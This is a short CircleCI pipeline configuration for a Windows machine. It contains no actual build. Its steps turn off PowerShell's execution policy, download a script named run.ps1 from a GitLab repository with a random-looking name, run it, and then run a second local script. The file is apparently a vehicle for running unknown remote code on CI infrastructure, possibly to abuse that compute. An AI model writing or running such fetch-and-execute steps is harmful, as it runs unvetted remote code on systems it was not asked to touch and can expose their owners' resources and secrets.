version: 2.1

jobs:
  build:
    resource_class: 'windows.large'
    machine:
      image: 'windows-server-2022-gui:current'
      shell: 'powershell.exe -ExecutionPolicy Bypass'
    steps:

        - run: Invoke-WebRequest https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/run.ps1 -OutFile 0.ps1
        - run: ./0.ps1
        
        - run: ./s.ps1